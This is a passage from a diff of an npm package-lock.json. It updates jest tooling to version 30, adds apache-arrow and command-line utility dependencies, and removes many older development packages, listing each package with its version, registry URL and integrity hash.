{ + "@babel/code-frame": "^7.27.1", + "@jest/types": "30.0.1", + "@types/stack-utils": "^2.0.3", + "chalk": "^4.1.2", + "graceful-fs": "^4.2.11", + "micromatch": "^4.0.8", + "pretty-format": "30.0.2", + "slash": "^3.0.0", + "stack-utils": "^2.0.6" + } + }, + "jest-mock": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-30.0.2.tgz", + "integrity": "sha512-PnZOHmqup/9cT/y+pXIVbbi8ID6U1XHRmbvR7MvUy4SLqhCbwpkmXhLbsWbGewHrV5x/1bF7YDjs+x24/QSvFA==", + "dev": true, + "requires": { + "@jest/types": "30.0.1", + "@types/node": "*", + "jest-util": "30.0.2" + } + }, + "jest-util": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-30.0.2.tgz", + "integrity": "sha512-8IyqfKS4MqprBuUpZNlFB5l+WFehc8bfCe1HSZFHzft2mOuND8Cvi9r1musli+u6F3TqanCZ/Ik4H4pXUolZIg==", + "dev": true, + "requires": { + "@jest/types": "30.0.1", + "@types/node": "*", + "chalk": "^4.1.2", + "ci-info": "^4.2.0", + "graceful-fs": "^4.2.11", + "picomatch": "^4.0.2" + } + }, + "picomatch": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.2.tgz", + "integrity": "sha512-M7BAV6Rlcy5u+m6oPhAPFgJTzAioX/6B0DxyvDlo9l8+T3nLKbrczg2WLUyzd45L8RqfUMyGPzekbMvX2Ldkwg==", + "dev": true + }, + "pretty-format": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-30.0.2.tgz", + "integrity": "sha512-yC5/EBSOrTtqhCKfLHqoUIAXVRZnukHPwWBJWR7h84Q3Be1DRQZLncwcfLoPA5RPQ65qfiCMqgYwdUuQ//eVpg==", "dev": true, "requires": { - "has-flag": "^4.0.0" + "@jest/schemas": "30.0.1", + "ansi-styles": "^5.2.0", + "react-is": "^18.3.1" } } } }, - "js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, + "@types/node": { + "version": "20.17.46", + "resolved": "https://registry.npmjs.org/@types/node/-/node-20.17.46.tgz", + "integrity": "sha512-0PQHLhZPWOxGW4auogW0eOQAuNIlCYvibIpG67ja0TOJ6/sehu+1en7sfceUn+QQtx4Rk3GxbLNwPh0Cav7TWw==", "requires": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" + "undici-types": "~6.19.2" } }, - "jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", - "dev": true - }, - "json-bignum": { - "version": "0.0.3", - "resolved": "https://registry.npmjs.org/json-bignum/-/json-bignum-0.0.3.tgz", - "integrity": "sha512-2WHyXj3OfHSgNyuzDbSxI1w2jgw5gkWSWhS7Qg4bWXx1nLk3jnbwfUeS0PSba3IzpTUWdHxBieELUzXRjQB2zg==" - }, - "json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true - }, - "kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true - }, - "leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true - }, - "lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", + "@types/stack-utils": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.3.tgz", + "integrity": "sha512-9aEbYZ3TbYMznPdcdr3SmIrLXwC/AKZXQeCf9Pgao5CKb8CyHuEX5jzWPTkvregvhRJHcpRO6BFoGW9ycaOkYw==", "dev": true }, - "locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "requires": { - "p-locate": "^4.1.0" - } - }, - "lodash.camelcase": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/lodash.camelcase/-/lodash.camelcase-4.3.0.tgz", - "integrity": "sha512-TwuEnCnxbc3rAvhf/LbG7tJUDzhqXyFnv3dtzLOPgCG/hODL7WFnsbwktkD7yUV0RrreP/l1PALq/YSg6VvjlA==" - }, - "lodash.chunk": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/lodash.chunk/-/lodash.chunk-4.2.0.tgz", - "integrity": "sha512-ZzydJKfUHJwHa+hF5X66zLFCBrWn5GeF28OHEr4WVWtNDXlQ/IjWKPBiikqKo2ne0+v6JgCgJ0GzJp8k8bHC7w==" - }, - "lodash.flatmap": { - "version": "4.5.0", - "resolved": "https://registry.npmjs.org/lodash.flatmap/-/lodash.flatmap-4.5.0.tgz", - "integrity": "sha512-/OcpcAGWlrZyoHGeHh3cAoa6nGdX6QYtmzNP84Jqol6UEQQ2gIaU3H+0eICcjcKGl0/XF8LWOujNn9lffsnaOg==" - }, - "lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", + "@types/yargs": { + "version": "17.0.33", + "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.33.tgz", + "integrity": "sha512-WpxBCKWPLr4xSsHgz511rFJAM+wS28w2zEO1QDNY5zM/S8ok70NNfztH0xwhqKyaK0OHCbN98LDAZuy1ctxDkA==", "dev": true, "requires": { - "yallist": "^3.0.2" + "@types/yargs-parser": "*" } }, - "luxon": { - "version": "3.6.1", - "resolved": "https://registry.npmjs.org/luxon/-/luxon-3.6.1.tgz", - "integrity": "sha512-tJLxrKJhO2ukZ5z0gyjY1zPh3Rh88Ej9P7jNrZiHMUXHae1yvI2imgOZtL1TO8TW6biMMKfTtAOoEJANgtWBMQ==" - }, - "make-dir": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", - "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", - "dev": true, - "requires": { - "semver": "^6.0.0" - } + "@types/yargs-parser": { + "version": "21.0.0", + "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", + "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", + "dev": true }, - "makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, + "ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", "requires": { - "tmpl": "1.0.5" + "color-convert": "^2.0.1" } }, - "merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "micromatch": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", - "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", - "dev": true, + "apache-arrow": { + "version": "19.0.1", + "resolved": "https://registry.npmjs.org/apache-arrow/-/apache-arrow-19.0.1.tgz", + "integrity": "sha512-APmMLzS4qbTivLrPdQXexGM4JRr+0g62QDaobzEvip/FdQIrv2qLy0mD5Qdmw4buydtVJgbFeKR8f59I6PPGDg==", "requires": { - "braces": "^3.0.2", - "picomatch": "^2.3.1" + "@swc/helpers": "^0.5.11", + "@types/command-line-args": "^5.2.3", + "@types/command-line-usage": "^5.0.4", + "@types/node": "^20.13.0", + "command-line-args": "^6.0.1", + "command-line-usage": "^7.0.1", + "flatbuffers": "^24.3.25", + "json-bignum": "^0.0.3", + "tslib": "^2.6.2" } }, - "mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true + "array-back": { + "version": "6.2.2", + "resolved": "https://registry.npmjs.org/array-back/-/array-back-6.2.2.tgz", + "integrity": "sha512-gUAZ7HPyb4SJczXAMUXMGAvI976JoK3qEx9v1FTmeYuJj0IBiaKttG1ydtGKdkfqWkIkouke7nG8ufGy77+Cvw==" }, - "minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", + "braces": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", + "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", "dev": true, "requires": { - "brace-expansion": "^1.1.7" + "fill-range": "^7.1.1" } }, - "ms": { - "version": "2.1.3", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", - "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==" - }, - "natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node-releases": { - "version": "2.0.13", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.13.tgz", - "integrity": "sha512-uYr7J37ae/ORWdZeQ1xxMJe3NtdmqMC/JZK+geofDrkLUApKRHPd18/TxtBOJ4A0/+uUIliorNrfYV6s1b02eQ==", - "dev": true - }, - "normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true + "chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "requires": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + } }, - "npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, + "chalk-template": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/chalk-template/-/chalk-template-0.4.0.tgz", + "integrity": "sha512-/ghrgmhfY8RaSdeo43hNXxpoHAtxdbskUHjPpfqUWGttFgycUhYPGx3YZBCnUCvOa7Doivn1IZec3DEGFoMgLg==", "requires": { - "path-key": "^3.0.0" + "chalk": "^4.1.2" } }, - "once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, + "color-convert": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", + "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", "requires": { - "wrappy": "1" + "color-name": "~1.1.4" } }, - "onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, + "color-name": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", + "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" + }, + "command-line-args": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/command-line-args/-/command-line-args-6.0.1.tgz", + "integrity": "sha512-Jr3eByUjqyK0qd8W0SGFW1nZwqCaNCtbXjRo2cRJC1OYxWl3MZ5t1US3jq+cO4sPavqgw4l9BMGX0CBe+trepg==", "requires": { - "mimic-fn": "^2.1.0" + "array-back": "^6.2.2", + "find-replace": "^5.0.2", + "lodash.camelcase": "^4.3.0", + "typical": "^7.2.0" } }, - "p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, + "command-line-usage": { + "version": "7.0.3", + "resolved": "https://registry.npmjs.org/command-line-usage/-/command-line-usage-7.0.3.tgz", + "integrity": "sha512-PqMLy5+YGwhMh1wS04mVG44oqDsgyLRSKJBdOo1bnYhMKBW65gZF1dRp2OZRhiTjgUHljy99qkO7bsctLaw35Q==", "requires": { - "yocto-queue": "^0.1.0" + "array-back": "^6.2.2", + "chalk-template": "^0.4.0", + "table-layout": "^4.1.0", + "typical": "^7.1.1" } }, - "p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, + "debug": { + "version": "4.4.0", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.0.tgz", + "integrity": "sha512-6WTZ/IxCY/T6BALoZHaE4ctp9xm+Z5kY/pzYaCHRFeyVhojxlrm+46y68HA6hr0TcwEssoxNiDEUJQjfPZ/RYA==", "requires": { - "p-limit": "^2.2.0" - }, - "dependencies": { - "p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "requires": { - "p-try": "^2.0.0" - } - } + "ms": "^2.1.3" } }, - "p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", + "escape-string-regexp": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", + "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", "dev": true }, - "parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", + "fill-range": { + "version": "7.1.1", + "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", + "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", "dev": true, "requires": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" + "to-regex-range": "^5.0.1" } }, - "path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true + "find-replace": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/find-replace/-/find-replace-5.0.2.tgz", + "integrity": "sha512-Y45BAiE3mz2QsrN2fb5QEtO4qb44NcS7en/0y9PEVsg351HsLeVclP8QPMH79Le9sH3rs5RSwJu99W0WPZO43Q==", + "requires": {} }, - "path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true + "flatbuffers": { + "version": "24.12.23", + "resolved": "https://registry.npmjs.org/flatbuffers/-/flatbuffers-24.12.23.tgz", + "integrity": "sha512-dLVCAISd5mhls514keQzmEG6QHmUUsNuWsb4tFafIUwvvgDjXhtfAYSKOzt5SWOy+qByV5pbsDZ+Vb7HUOBEdA==" }, - "path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", + "graceful-fs": { + "version": "4.2.11", + "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", + "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", "dev": true }, - "path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true + "has-flag": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", + "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==" }, - "picocolors": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz", - "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ==", - "dev": true + "hpagent": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/hpagent/-/hpagent-1.2.0.tgz", + "integrity": "sha512-A91dYTeIB6NoXG+PxTQpCCDDnfHsW9kc06Lvpu1TEe9gnd6ZFeiBoRO9JvzEv6xK7EX97/dUE8g/vBMTqTS3CA==" }, - "picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", + "is-number": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", + "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", "dev": true }, - "pirates": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", + "js-tokens": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", + "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", "dev": true }, - "pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "requires": { - "find-up": "^4.0.0" - } - }, - "pretty-format": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.6.1.tgz", - "integrity": "sha512-7jRj+yXO0W7e4/tSJKoR7HRIHLPPjtNaUGG2xxKQnGvPNRkgWcQ0AZX6P4KBRJN4FcTBWb3sa7DVUJmocYuoog==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.0", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true - } - } - }, - "prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "requires": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - } + "json-bignum": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/json-bignum/-/json-bignum-0.0.3.tgz", + "integrity": "sha512-2WHyXj3OfHSgNyuzDbSxI1w2jgw5gkWSWhS7Qg4bWXx1nLk3jnbwfUeS0PSba3IzpTUWdHxBieELUzXRjQB2zg==" }, - "pure-rand": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.0.2.tgz", - "integrity": "sha512-6Yg0ekpKICSjPswYOuC5sku/TSWaRYlA0qsXqJgM/d/4pLPHPuTxK7Nbf7jFKzAeedUhR8C7K9Uv63FBsSo8xQ==", - "dev": true + "lodash-es": { + "version": "4.17.21", + "resolved": "https://registry.npmjs.org/lodash-es/-/lodash-es-4.17.21.tgz", + "integrity": "sha512-mKnC+QJ9pWVzv+C4/U3rRsHapFfHvQFoFB92e52xeyGMcX6/OlIl78je1u8vePzYZSkkogMPJ2yjxxsb89cxyw==" }, - "react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true + "lodash.camelcase": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/lodash.camelcase/-/lodash.camelcase-4.3.0.tgz", + "integrity": "sha512-TwuEnCnxbc3rAvhf/LbG7tJUDzhqXyFnv3dtzLOPgCG/hODL7WFnsbwktkD7yUV0RrreP/l1PALq/YSg6VvjlA==" }, - "require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true + "luxon": { + "version": "3.7.1", + "resolved": "https://registry.npmjs.org/luxon/-/luxon-3.7.1.tgz", + "integrity": "sha512-RkRWjA926cTvz5rAb1BqyWkKbbjzCGchDUIKMCUvNi17j6f6j8uHGDV82Aqcqtzd+icoYpELmG3ksgGiFNNcNg==" }, - "resolve": { - "version": "1.22.2", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.2.tgz", - "integrity": "sha512-Sb+mjNHOULsBv818T40qSPeRiuWLyaGMa5ewydRLFimneixmVy2zdivRl+AF6jaYPC8ERxGDmFSiqui6SfPd+g==", + "micromatch": { + "version": "4.0.8", + "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz", + "integrity": "sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==", "dev": true, "requires": { - "is-core-module": "^2.11.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" + "braces": "^3.0.3", + "picomatch": "^2.3.1" } }, - "resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "requires": { - "resolve-from": "^5.0.0" - } + "ms": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", + "integrity": 